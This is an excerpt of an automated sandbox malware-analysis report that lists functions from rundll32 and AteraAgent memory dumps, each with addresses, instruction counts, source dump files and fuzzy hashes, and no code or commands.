                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 876acd309ee93e501195c0b23c6da7e1a6ccb880bf67d8a1d3df2f622fb47406
                                                                                                                                                                                                                                                                            • Instruction ID: ababc33c2f103adfd89417f9e6f6de918d269e91c43d825fb5e27d3a073a3966
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 876acd309ee93e501195c0b23c6da7e1a6ccb880bf67d8a1d3df2f622fb47406
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F801F4353093418FEB19AB74E9596AA3F63EF81211B048469E0018F1A2DE21B84A9781
                                                                                                                                                                                                                                                                            Function 04332A78 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 60755ec4cd9ff3ccdc271366b2afdbe000df285be220924b1da8af5b49265cd1
                                                                                                                                                                                                                                                                            • Instruction ID: 35becbc7ef4ea6ab699649eaa59de92d42df5962df0c394dcfd6db185f3e5a10
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 60755ec4cd9ff3ccdc271366b2afdbe000df285be220924b1da8af5b49265cd1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE011979B142148FCB18EF78D405AAE7BF5EB89615B10006AE909DB364EF71AD02CB80
                                                                                                                                                                                                                                                                            Function 007ED01C Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1457684593.00000000007ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ed000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 6ac6c251271d165fc48088f92e19da86f9965843e3b8727ff8c8c9a0441c2941
                                                                                                                                                                                                                                                                            • Instruction ID: a407c56cc6736b0c0f2c248d1f288cf604ec0835ac4b0af70a3222370a47eec5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ac6c251271d165fc48088f92e19da86f9965843e3b8727ff8c8c9a0441c2941
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4EF0C271005380AEE7208A16CD84B63FF98EB45335F18C55AED480E282C2799C41CAB1
                                                                                                                                                                                                                                                                            Function 04331431 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 1c866b161f46a58ae4585f752048ef57f1917f443ee6fcd52dcb13cd3eac6a97
                                                                                                                                                                                                                                                                            • Instruction ID: 273aa5235262769b79ff228ecaf25a4f9beaf4e68998ea0219bc8937fca21b69
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c866b161f46a58ae4585f752048ef57f1917f443ee6fcd52dcb13cd3eac6a97
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5F0F674F043415FDB095FB8706A2153FA6EFD921231608ADD686CF1A0FD25E941C3C1
                                                                                                                                                                                                                                                                            Function 043329A8 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: f6071c5934080eac568a4f9ca11b30b32946c4616fb5fa5bee32ff6fa8a88054
                                                                                                                                                                                                                                                                            • Instruction ID: d4334530df02f30d28623cd3f7724841cd1c8e63d11a283ce03fca661ae7125c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6071c5934080eac568a4f9ca11b30b32946c4616fb5fa5bee32ff6fa8a88054
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48F0E2303153008BEB19AB74E90DAAE3B66FF80216B00843AF1068F261DF76FC4997D1
                                                                                                                                                                                                                                                                            Function 04332A20 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 1abb69827405ab574e85f2906d3d51d875c78e4fa2658febd212ec3fb6c9ca69
                                                                                                                                                                                                                                                                            • Instruction ID: 8ef49819c1f0e821497c437063296e6138c1b3ebaef151cc50cc4316837dff79
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1abb69827405ab574e85f2906d3d51d875c78e4fa2658febd212ec3fb6c9ca69
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2E0D82130F2E48F8B161AB974181BF3FF94E5372231A50DAD489C61B2CF089C828355
                                                                                                                                                                                                                                                                            Function 04332A30 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: a3cfbe8f054e8ef05a293a28a21686860b13ce43b4d42b2a5229f0e55fcbb17f
                                                                                                                                                                                                                                                                            • Instruction ID: 3a5d310183878c866baabe0a9f22ef413333d53b2711c3080deef28133a1865c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3cfbe8f054e8ef05a293a28a21686860b13ce43b4d42b2a5229f0e55fcbb17f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53D0C2303025288B9A1419AA74082BF35AC9B416627011065E40AC2280DF0CDD814388
                                                                                                                                                                                                                                                                            Function 04332959 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: a3d6fa9d7fc026d93aa6c9c3865b9bfb1788f5c4f71c4766c72e60ebcae8af17
                                                                                                                                                                                                                                                                            • Instruction ID: 02a6c7f5087c735039be253038ee54c3de7bd2530ebcda15d65aecd92ce9b3a6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3d6fa9d7fc026d93aa6c9c3865b9bfb1788f5c4f71c4766c72e60ebcae8af17
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25E09AB080D388AFCB05CFB4E8505DDBFB49F0B200B2145EAC484DB222EA305A12D782
                                                                                                                                                                                                                                                                            Function 04335EB0 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: cacfef49fe39a18e6f2039ad3960b9167b2bd781e3c92cdc7b37359b67cc6370
                                                                                                                                                                                                                                                                            • Instruction ID: 2d7d2f3a66fd6174516719bf8a311ae226e121a153152895152f09375003bdb3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cacfef49fe39a18e6f2039ad3960b9167b2bd781e3c92cdc7b37359b67cc6370
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09E05B363953914FDB02577CE0605A53FB2FF4B755F1100D6D186CF2B2DA159842C744
                                                                                                                                                                                                                                                                            Function 04330C48 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 379713f707a66f3881c4a0ffb21f15aac17813871026ecd38ee575df00c92686
                                                                                                                                                                                                                                                                            • Instruction ID: a8db567b7e381230b1d490447276cebb602a98f826fbef25cc48f6bd01f43f6a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 379713f707a66f3881c4a0ffb21f15aac17813871026ecd38ee575df00c92686
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3D0A7313616205FD204525CD450A59379DDB8A715B00049AF10ACB320C951FC410389
                                                                                                                                                                                                                                                                            Function 04330C0C Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 6cd8d558dca5b6d614835957c4ae856dae2acec84c1cc341f15632349cb87fc3
                                                                                                                                                                                                                                                                            • Instruction ID: 8bfdd87dfd6f4efe2196d92c35b42168ae53498a5b0e418ec044cc00a8d55ba5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6cd8d558dca5b6d614835957c4ae856dae2acec84c1cc341f15632349cb87fc3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12D0A73232461C6B96086654D8469AA7BADEB942623504423F9018B220DD607C4593DA
                                                                                                                                                                                                                                                                            Function 043317F0 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: fc6a2986b1e94783976a85bbd87b8b33ed9a9cecc7922f647a01726c6b6c6d2d
                                                                                                                                                                                                                                                                            • Instruction ID: c3f388c995773daa367ab80b203c26e909c02bdd270b83b3da2a07a41e367956
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fc6a2986b1e94783976a85bbd87b8b33ed9a9cecc7922f647a01726c6b6c6d2d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98D05B363592845FD709D764F4164B67FB6AB4B3113045057D445CB575DE240851D744
                                                                                                                                                                                                                                                                            Function 04332968 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: aa8f2a0855ee2c4d2fd7207975f0c634922dccdf5b9296172640710d6957ab32
                                                                                                                                                                                                                                                                            • Instruction ID: 5cb02067f101fcaaf1aaa8e20b15b2420f33c3b2f05b37f403a89a22ba58fb14
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa8f2a0855ee2c4d2fd7207975f0c634922dccdf5b9296172640710d6957ab32
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04D05E7490920CDFCB04DFB4E94599DBFF9EB45200B2086A5980497224EE30AE01CB81
                                                                                                                                                                                                                                                                            Function 04330440 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 4bd588376b0fe8b86458f5945db1de88f04a49249b5f5345c4cf9934634d4a00
                                                                                                                                                                                                                                                                            • Instruction ID: 1fb4be817d90996924475b963c017878c2e48a544cbc1d53f49a375abadf5e86
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4bd588376b0fe8b86458f5945db1de88f04a49249b5f5345c4cf9934634d4a00
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0AD012B7664642AFD3024A0844911F77770FE72B1B3854191D08088057E2296153CAA1

                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                            Function 00007FFAAB45172D Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 0W=
                                                                                                                                                                                                                                                                            • API String ID: 0-2879975314
                                                                                                                                                                                                                                                                            • Opcode ID: 72c1b184f19c50b8d3294d28290c30299966c4edea24deab53728def2f33b06a
                                                                                                                                                                                                                                                                            • Instruction ID: bf4714c37dcbefa4638d7054c332e3ae6e55adeabf9642f61422e499aad4ad82
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 72c1b184f19c50b8d3294d28290c30299966c4edea24deab53728def2f33b06a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A417C71D19A198FDB65DB18C4947E8B7B1FF59340F5082F9C00E97295CA386D85CF90
                                                                                                                                                                                                                                                                            Function 00007FFAAB45C922 Relevance: .5, Instructions: 463COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 74fd20f7f6f0356f31c4ce7f7380169ae5ab6cfb51bc6ca91b6b6d84e22587c5
                                                                                                                                                                                                                                                                            • Instruction ID: 8fc610c5e6b63797c9ba32bdad400460ed4658dcec0b23f46babdde38f839e5c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74fd20f7f6f0356f31c4ce7f7380169ae5ab6cfb51bc6ca91b6b6d84e22587c5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2DE1D37090DA4E8FEBA8DF28D8557E97BD1FB55350F04826ED84DC72A2CE74984487C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB451FAC Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 44c6afc72591893629a931a86e7b6baede3a29a418a2f4bad0b18f3ade4846ba
                                                                                                                                                                                                                                                                            • Instruction ID: 4faaa1e74a5b11f61bbd1018e38e2f964a33f1e3f824ed6ec4b48ad354d83a4a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44c6afc72591893629a931a86e7b6baede3a29a418a2f4bad0b18f3ade4846ba
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA116D7180AA199FE7A5DB2888557F97BA1EF46650F1441BAD00D932A2DE381E898B80
                                                                                                                                                                                                                                                                            Function 00007FFAAB451A34 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: d7ea6719d7264e912c297afa72171c2b2b09fce3842f7a5ec8574163551f943c
                                                                                                                                                                                                                                                                            • Instruction ID: 4165512fdd54c8fae7bf99d83dbc6246150b15f210a3526b62f2cbf7a9b6d917
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7ea6719d7264e912c297afa72171c2b2b09fce3842f7a5ec8574163551f943c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE014C30C4E656CBE355DF2080002F8B6B4AF07340F5065BDD00E672A2CA799D88DA88
                                                                                                                                                                                                                                                                            Function 00007FFAAB450E53 Relevance: 9.3, Strings: 7, Instructions: 580COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: /3$/3$/3$/3$/3$/3$/3
                                                                                                                                                                                                                                                                            • API String ID: 0-1736428096
                                                                                                                                                                                                                                                                            • Opcode ID: 267b096df90224887e7d9cbaf788af7b968cf3b8f811c095a6896eedca63378b
                                                                                                                                                                                                                                                                            • Instruction ID: fc46bf39cea4818b45bb8740586190f1fe03554c26cb000ab44c18c126be74d0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 267b096df90224887e7d9cbaf788af7b968cf3b8f811c095a6896eedca63378b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83224B71908A1D8FDB99EB28C494AE9B7B2FF59304F6045FDC00ED7296CB35A981CB50
                                                                                                                                                                                                                                                                            Function 00007FFAAB45596C Relevance: 1.6, Strings: 1, Instructions: 388COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: M_^
                                                                                                                                                                                                                                                                            • API String ID: 0-3807191693
                                                                                                                                                                                                                                                                            • Opcode ID: 28af8b78b48ffa7977ddaa39f00f4f803bb9b3b9b39ea5ed5229886f56449bb0
                                                                                                                                                                                                                                                                            • Instruction ID: 91cd2239bf90b8c93e427871a9f2ac1836fd5c45c093057235a84e53274e4635
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28af8b78b48ffa7977ddaa39f00f4f803bb9b3b9b39ea5ed5229886f56449bb0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88C1F477A0EA869FD351A778E8555F87BE0EF82261B0447FBD08DCB0A3E91D18498391
                                                                                                                                                                                                                                                                            Function 00007FFAAB540114 Relevance: 1.5, Strings: 1, Instructions: 225COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1539302930.00007FFAAB540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB540000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab540000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 63
                                                                                                                                                                                                                                                                            • API String ID: 0-3819469774
                                                                                                                                                                                                                                                                            • Opcode ID: 33b57394620c0dee2e6400ed36d8ec080e2b1c3ab1ad2b3a5b399c1ff2de8044
                                                                                                                                                                                                                                                                            • Instruction ID: df46d152f8f277a05463c780b622470914ffa88377c31847b844b21cecaad729
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33b57394620c0dee2e6400ed36d8ec080e2b1c3ab1ad2b3a5b399c1ff2de8044
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2151C27070CA098FD758DB1CD895A7477E2FB9A710B1542BEE48FC32A6DE24EC068781
                                                                                                                                                                                                                                                                            Function 00007FFAAB540850 Relevance: 1.0, Instructions: 952COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1539302930.00007FFAAB540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB540000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab540000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: df8e7e460073753f02899cc2e08991b38b7ab9883ec96f9163bb870f540b5488
                                                                                                                                                                                                                                                                            • Instruction ID: a1d1dd4b6e5f5b95f85a50a892a16315431db21341ca67872c1483e9dcfa5fcb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df8e7e460073753f02899cc2e08991b38b7ab9883ec96f9163bb870f540b5488
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E9F12761B0DA4A8FD799972CD8196B87BE2EF56310B1841FAD08FC71B3CD18AC4687C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB45B679 Relevance: .4, Instructions: 417COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 4cca117aa9aadf0f59be00c5eba7e3b9069c991a846379bb9e1c7a9d9c74684b
                                                                                                                                                                                                                                                                            • Instruction ID: b71321ade91c66c4ec8d8307169d0f8537ae7e23bf52e5a23daa3ec8eb5a4148
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4cca117aa9aadf0f59be00c5eba7e3b9069c991a846379bb9e1c7a9d9c74684b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6D1D770908A8D8FEB68DF28C855BF977E1FF59300F04826EE84DC7291CB7599458B82
                                                                                                                                                                                                                                                                            Function 00007FFAAB456772 Relevance: .4, Instructions: 364COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
